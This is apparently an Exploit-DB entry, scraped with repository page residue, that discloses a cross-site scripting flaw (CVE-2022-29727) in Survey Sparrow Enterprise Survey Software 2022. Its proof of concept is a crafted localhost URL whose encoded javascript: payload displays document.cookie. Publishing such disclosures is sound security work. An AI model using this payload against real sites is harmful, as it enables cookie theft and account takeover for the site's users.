cbee98ca48
6 changes to exploits/shellcodes SDT-CW3B1 1.1.0 - OS Command Injection SolarView Compact 6.0 - OS Command Injection Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS) T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS) T-Soft E-Commerce 4 - SQLi (Authenticated) Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
20 lines
No EOL
632 B
Text
20 lines
No EOL
632 B
Text
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
|
|
# Date: May 11 2022
|
|
# Exploit Author: Pankaj Kumar Thakur
|
|
# Vendor Homepage: https://surveysparrow.com/
|
|
# Software Link: https://surveysparrow.com/enterprise-survey-software/
|
|
# Version: 2022
|
|
# Tested on: Windows
|
|
# CVE : CVE-2022-29727
|
|
# References:
|
|
https://www.tenable.com/cve/CVE-2022-29727
|
|
https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022
|
|
|
|
#POC
|
|
|
|
For Stored XSS
|
|
|
|
Visit
|
|
https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
|
|
|
|
XSS Executed |